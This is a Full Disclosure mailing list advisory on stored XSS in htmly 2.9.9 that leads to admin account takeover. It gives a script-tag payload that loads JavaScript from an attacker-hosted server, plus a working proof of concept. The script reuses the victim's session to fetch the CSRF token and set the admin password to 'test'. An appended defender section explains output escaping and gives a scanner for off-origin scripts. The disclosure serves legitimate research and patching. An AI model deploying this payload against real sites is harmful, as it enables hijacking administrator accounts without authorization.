Message-ID: <CAF2Wu1ay4xftOB0dZsWWxd-yZwg_T5e9v=Ux9Q=ULwzJyGZv1A@mail.gmail.com>
Date: Mon, 16 Sep 2024 17:16:14 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS to Account Takeover - htmlyv2.9.9

# Exploit Title: Stored XSS to Account Takeover - htmlyv2.9.9
# Date: 9/2024
# Exploit Author: Andrey Stoykov
# Version: 2.9.9
# Tested on: Ubuntu 22.04
# Blog: https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html


Description:

- It was found that the application suffers from stored XSS

- A low-level user with an "author" role can take over the admin account and
change its password by posting a malicious post that references a payload
hosted on an attacker domain



Stored XSS to Account Takeover #1:

Steps to Reproduce:

1. Visit "My Posts" > "Add New Post" > "Regular Post"
2. Enter the following payload into the "Content" field, referencing an
externally hosted PoC in JavaScript:
 <script src="http://192.168.159.191:8000/xss.js"></script>
3. Upon visiting the blog post, the admin account password would be changed
to "test"
4. In the XSS payload pasted below, adjust the "passwordChangePageUrl",
"username" and "password" values


// Javascript POC

// Function to fetch CSRF token and perform password change
(function() {
    // URL of the password change page
    const passwordChangePageUrl = 'http://192.168.159.191/htmly/edit/password';

    // Function to fetch the CSRF token
    function fetchCsrfToken() {
        fetch(passwordChangePageUrl, {
            method: 'GET',
            credentials: 'include' // Include cookies for the current session
        })
        .then(response => response.text())
        .then(html => {
            // Parse the HTML to find the CSRF token
            const parser = new DOMParser();
            const doc = parser.parseFromString(html, 'text/html');
            const csrfTokenInput = doc.querySelector('input[name="csrf_token"]');
            if (csrfTokenInput) {
                const csrfToken = csrfTokenInput.value;
                console.log('CSRF Token:', csrfToken);
                changePassword(csrfToken);
            } else {
                console.error('CSRF token not found');
            }
        })
        .catch(error => console.error('Error fetching CSRF token:', error));
    }

    // Function to change the password
    function changePassword(csrfToken) {
        const postData = new URLSearchParams();
        postData.append('csrf_token', csrfToken);
        postData.append('username', 'admin');
        postData.append('password', 'test');

        fetch(passwordChangePageUrl, {
            method: 'POST',
            body: postData,
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded'
            },
            credentials: 'include' // Include cookies for the current session
        })
        .then(response => response.text())
        .then(data => {
            console.log('Password change response:', data);
        })
        .catch(error => console.error('Error changing password:', error));
    }

    // Trigger the CSRF token fetch and password change
    fetchCsrfToken();
})();
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
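Defender-side view of the bug above, as an added example that is neither the advisory author's code nor htmly's own: the CSRF token offers no protection here because the injected script runs same-origin and simply reads the token from the form, so the fix has to stop author-supplied HTML from being rendered as markup (escape it on output) and, as an audit, stored posts can be scanned for `<script src=...>` pointing off-site, which is the exact primitive the PoC relies on. The site origin, the sample post body and the function names are assumptions made for this example.

```javascript
// Added example (not from the advisory or from htmly). Two defender-side checks:
// 1) escapeUntrustedHtml(): render author-supplied content as text, not markup.
// 2) findExternalScripts(): audit stored post bodies for <script src=...> whose
//    origin differs from the blog's own origin.

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can break out of an HTML text context.
function escapeUntrustedHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Return the resolved URLs of every <script src=...> in `html` whose origin is
// not `siteOrigin`. Relative sources resolve against siteOrigin and are kept;
// unparsable sources are reported as-is so they get looked at too.
function findExternalScripts(html, siteOrigin) {
  const found = [];
  const ownOrigin = new URL(siteOrigin).origin;
  const scriptTag = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    let url;
    try {
      url = new URL(m[1], siteOrigin);
    } catch (e) {
      found.push(m[1]);
      continue;
    }
    if (url.origin !== ownOrigin) found.push(url.href);
  }
  return found;
}

// Constructed sample (assumption): the advisory's payload stored as post content,
// with the blog itself served from http://192.168.159.191 as in the PoC URL.
const SITE_ORIGIN = 'http://192.168.159.191';
const SAMPLE_POST =
  'Hello <b>world</b> <script src="http://192.168.159.191:8000/xss.js"></script>';

// Escaped output contains no live tags; the audit flags the off-origin script
// (port 8000 is a different origin from the blog on port 80).
console.log(escapeUntrustedHtml(SAMPLE_POST));
console.log(findExternalScripts(SAMPLE_POST, SITE_ORIGIN));
```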